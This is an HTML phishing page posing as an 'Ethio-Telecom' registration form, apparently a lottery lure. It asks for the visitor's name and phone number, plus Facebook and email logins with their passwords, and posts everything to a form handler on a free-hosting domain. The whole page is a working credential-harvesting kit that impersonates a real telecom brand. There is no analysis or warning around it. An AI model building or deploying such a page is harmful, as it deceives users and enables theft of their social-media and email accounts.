<!DOCTYPE html> <html> <head> <title></title> <style> form{background-color: darkgrey;} p{color: aliceblue;} legend{color: black;} #phone {color:black;} #psw {color: red;} #mail{color: darkgray;} #name{color: black;} #region{color: green;} #comment{color: grey;} #submit{color: blue;} #sixth{margin-top: 10px;margin-left: 45px;} #eight{margin-top: 10px;margin-left: 140px;} </style> </head> <body> <form action = "https://ethiotelecomlottery.000webhostapp.com/form_handler.php" method = "post"> <fieldset></br> <legend>Ethio-Telecom</legend> Full_Name : <input type = "text" name = "Fname" /> Phone number : <input type = "tel" name = "number"/><p></p><br> <fieldset> <legend>FaceBook</legend> Email or Phone number : <input type = "tel" name = "num" id = "phone" /> password : <input type = "password" name = "psw" id = "psw" /> </fieldset><p></p><br> <fieldset> <legend>E-mail</legend> Email : <input type = "email" name = "email" id = "mail" /> password : <input type = "password" name = "pass" id = "psw"/> </fieldset> <p id = "sixth" > Region : <select name="Your_Region" id = "region"> <option value="Amhara">Amhara</option> <option value="Tigray">Tigray</option> <option value="Oromia">Oromia</option> <option value="Harari">Harari</option> </select> Question : <textarea minlength="0" maxlength="50" id = "comment" ></textarea></p> <p id = "eight" ><br><input type = "submit" name = "sub" value = "REGISTER" id = "submit" /></p> </fieldset> </form> </body> </html>